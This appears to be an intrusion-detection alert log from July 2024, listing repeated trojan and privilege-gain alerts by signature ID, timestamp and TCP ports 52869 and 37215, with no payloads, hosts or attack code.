                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:05.506482
                      SID:2027339
                      Source Port:47272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:20.036130
                      SID:2027339
                      Source Port:43458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.185032
                      SID:2829579
                      Source Port:34626
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.745085
                      SID:2831300
                      Source Port:33088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.677189
                      SID:2831300
                      Source Port:37400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.619336
                      SID:2027339
                      Source Port:37076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.837135
                      SID:2831300
                      Source Port:34854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:14.035496
                      SID:2835222
                      Source Port:34068
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.064358
                      SID:2829579
                      Source Port:34402
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.641803
                      SID:2835222
                      Source Port:47368
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.593869
                      SID:2027339
                      Source Port:56606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.883171
                      SID:2829579
                      Source Port:60342
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.399866
                      SID:2025132
                      Source Port:44106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:13.649188
                      SID:2025132
                      Source Port:51914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.124696
                      SID:2835222
                      Source Port:53234
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.050672
                      SID:2829579
                      Source Port:33384
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.334934
                      SID:2829579
                      Source Port:44412
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.978984
                      SID:2025132
                      Source Port:56542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.101588
                      SID:2027339
                      Source Port:53848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.059102
                      SID:2027339
                      Source Port:44128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.062277
                      SID:2835222
                      Source Port:54054
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.978141
                      SID:2829579
                      Source Port:42054
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.565132
                      SID:2831300
                      Source Port:57282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.735394
                      SID:2025132
                      Source Port:44298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.957638
                      SID:2027339
                      Source Port:47288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.270914
                      SID:2027339
                      Source Port:54396
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.138222
                      SID:2027339
                      Source Port:50114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.366269
                      SID:2025132
                      Source Port:48042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.976795
                      SID:2829579
                      Source Port:46866
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.019511
                      SID:2027339
                      Source Port:33072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.639093
                      SID:2829579
                      Source Port:52086
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.631448
                      SID:2025132
                      Source Port:34526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.556921
                      SID:2027339
                      Source Port:39934
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.976984
                      SID:2835222
                      Source Port:38654
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.730531
                      SID:2027339
                      Source Port:45796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.677485
                      SID:2831300
                      Source Port:57276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.459589
                      SID:2025132
                      Source Port:43272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.713313
                      SID:2831300
                      Source Port:40798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.563729
                      SID:2831300
                      Source Port:59400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.144821
                      SID:2831300
                      Source Port:40362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.826098
                      SID:2025132
                      Source Port:59266
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.221557
                      SID:2835222
                      Source Port:43680
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.683684
                      SID:2027339
                      Source Port:37206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.322217
                      SID:2831300
                      Source Port:52702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.882275
                      SID:2025132
                      Source Port:34572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.730585
                      SID:2835222
                      Source Port:60510
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.135089
                      SID:2027339
                      Source Port:57444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.862503
                      SID:2831300
                      Source Port:37346
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.343151
                      SID:2835222
                      Source Port:58374
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.895586
                      SID:2025132
                      Source Port:52138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.631925
                      SID:2027339
                      Source Port:34438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.092575
                      SID:2027339
                      Source Port:45468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.735607
                      SID:2027339
                      Source Port:39890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.677485
                      SID:2027339
                      Source Port:54274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.547161
                      SID:2025132
                      Source Port:59820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.222279
                      SID:2829579
                      Source Port:60150
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.317774
                      SID:2027339
                      Source Port:51874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.768078
                      SID:2025132
                      Source Port:60488
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:09.263272
                      SID:2831300
                      Source Port:43816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.933370
                      SID:2835222
                      Source Port:41828
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.076593
                      SID:2835222
                      Source Port:53012
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.606848
                      SID:2027339
                      Source Port:36948
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.540580
                      SID:2025132
                      Source Port:49004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.129029
                      SID:2027339
                      Source Port:40978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.422050
                      SID:2025132
                      Source Port:57534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:13.694393
                      SID:2025132
                      Source Port:58076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:59.513085
                      SID:2025132
                      Source Port:53334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:59.707284
                      SID:2027339
                      Source Port:52044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.885895
                      SID:2829579
                      Source Port:46230
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.049279
                      SID:2835222
                      Source Port:49198
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.290547
                      SID:2025132
                      Source Port:38308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:21.931985
                      SID:2829579
                      Source Port:35820
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.022763
                      SID:2835222
                      Source Port:44248
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.827502
                      SID:2027339
                      Source Port:55088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.188773
                      SID:2027339
                      Source Port:48818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.668349
                      SID:2027339
                      Source Port:53924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.639093
                      SID:2829579
                      Source Port:44420
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.147883
                      SID:2025132
                      Source Port:39284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.334452
                      SID:2835222
                      Source Port:56216
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.719998
                      SID:2025132
                      Source Port:40662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.524925
                      SID:2025132
                      Source Port:59212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.098909
                      SID:2835222
                      Source Port:51778
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.419124
                      SID:2027339
                      Source Port:36358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.504220
                      SID:2831300
                      Source Port:58452
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.960623
                      SID:2027339
                      Source Port:53334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.631749
                      SID:2025132
                      Source Port:52014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.827952
                      SID:2831300
                      Source Port:40648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.150119
                      SID:2025132
                      Source Port:42464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.863938
                      SID:2025132
                      Source Port:58594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.181097
                      SID:2027339
                      Source Port:44604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.031141
                      SID:2027339
                      Source Port:48568
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.053061
                      SID:2835222
                      Source Port:43202
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.164018
                      SID:2025132
                      Source Port:34592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.299284
                      SID:2025132
                      Source Port:55122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.640312
                      SID:2829579
                      Source Port:57096
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.160872
                      SID:2025132
                      Source Port:47360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.650213
                      SID:2831300
                      Source Port:34576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.888072
                      SID:2027339
                      Source Port:53918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.245522
                      SID:2025132
                      Source Port:57362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.001716
                      SID:2027339
                      Source Port:36388
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.482723
                      SID:2027339
                      Source Port:41540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.677519
                      SID:2829579
                      Source Port:40302
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:09.032669
                      SID:2027339
                      Source Port:54312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.485082
                      SID:2831300
                      Source Port:51436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.231819
                      SID:2831300
                      Source Port:45896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.376233
                      SID:2831300
                      Source Port:42130
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:09.021221
                      SID:2027339
                      Source Port:59966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.984532
                      SID:2027339
                      Source Port:40688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.728248
                      SID:2025132
                      Source Port:37640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.470704
                      SID:2027339
                      Source Port:45810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.501891
                      SID:2027339
                      Source Port:46770
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.612597
                      SID:2027339
                      Source Port:45456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.124037
                      SID:2027339
                      Source Port:39086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.635828
                      SID:2835222
                      Source Port:39608
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.986585
                      SID:2027339
                      Source Port:52706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:09.027075
                      SID:2027339
                      Source Port:49516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.978983
                      SID:2027339
                      Source Port:59718
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.459445
                      SID:2027339
                      Source Port:50914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.201912
                      SID:2027339
                      Source Port:57420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.952783
                      SID:2835222
                      Source Port:36672
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.485253
                      SID:2027339
                      Source Port:58876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.295718
                      SID:2025132
                      Source Port:51266
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.622797
                      SID:2025132
                      Source Port:55116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.954688
                      SID:2025132
                      Source Port:36322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.354418
                      SID:2831300
                      Source Port:44534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.331820
                      SID:2027339
                      Source Port:48328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.844704
                      SID:2831300
                      Source Port:40656
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.956472
                      SID:2027339
                      Source Port:55608
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.915904
                      SID:2829579
                      Source Port:51416
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.489480
                      SID:2025132
                      Source Port:45674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.615260
                      SID:2831300
                      Source Port:46100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.934977
                      SID:2829579
                      Source Port:45554
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.355712
                      SID:2025132
                      Source Port:33494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.185033
                      SID:2829579
                      Source Port:42824
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.286738
                      SID:2835222
                      Source Port:52836
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.957856
                      SID:2027339
                      Source Port:39886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.999569
                      SID:2831300
                      Source Port:35682
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:56.510714
                      SID:2831300
                      Source Port:59026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:50.951743
                      SID:2027339
                      Source Port:42826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.172994
                      SID:2027339
                      Source Port:44444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.876750
                      SID:2829579
                      Source Port:40666
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.142024
                      SID:2027339
                      Source Port:57768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.098080
                      SID:2829579
                      Source Port:56136
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.870904
                      SID:2025132
                      Source Port:39194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.198416
                      SID:2027339
                      Source Port:33032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.729822
                      SID:2829579
                      Source Port:37160
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.979093
                      SID:2027339
                      Source Port:47772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.934726
                      SID:2831300
                      Source Port:46990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:03.266392
                      SID:2027339
                      Source Port:51400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.530676
                      SID:2027339
                      Source Port:50316
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.838688
                      SID:2831300
                      Source Port:50076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.045144
                      SID:2835222
                      Source Port:60586
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:05.374045
                      SID:2027339
                      Source Port:55868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.807536
                      SID:2025132
                      Source Port:37344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.407048
                      SID:2831300
                      Source Port:34170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:25.146493
                      SID:2025132
                      Source Port:45846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.666100
                      SID:2829579
                      Source Port:52076
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.809716
                      SID:2027339
                      Source Port:55558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.683848
                      SID:2025132
                      Source Port:39894
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.946379
                      SID:2027339
                      Source Port:34982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.196993
                      SID:2835222
                      Source Port:40010
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.640831
                      SID:2027339
                      Source Port:35834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.706302
                      SID:2027339
                      Source Port:39534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.149798
                      SID:2829579
                      Source Port:37938
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.202325
                      SID:2835222
                      Source Port:34146
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.796749
                      SID:2025132
                      Source Port:33462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.247958
                      SID:2829579
                      Source Port:60760
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.083998
                      SID:2027339
                      Source Port:60718
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.465464
                      SID:2025132
                      Source Port:41994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.986571
                      SID:2835222
                      Source Port:50630
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.948093
                      SID:2027339
                      Source Port:43810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.645051
                      SID:2835222
                      Source Port:55228
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.246775
                      SID:2027339
                      Source Port:59676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.175900
                      SID:2829579
                      Source Port:37304
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.933600
                      SID:2831300
                      Source Port:57584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.205395
                      SID:2025132
                      Source Port:57088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.343511
                      SID:2027339
                      Source Port:49584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.904906
                      SID:2835222
                      Source Port:41624
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.510114
                      SID:2025132
                      Source Port:43984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.096752
                      SID:2835222
                      Source Port:37104
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
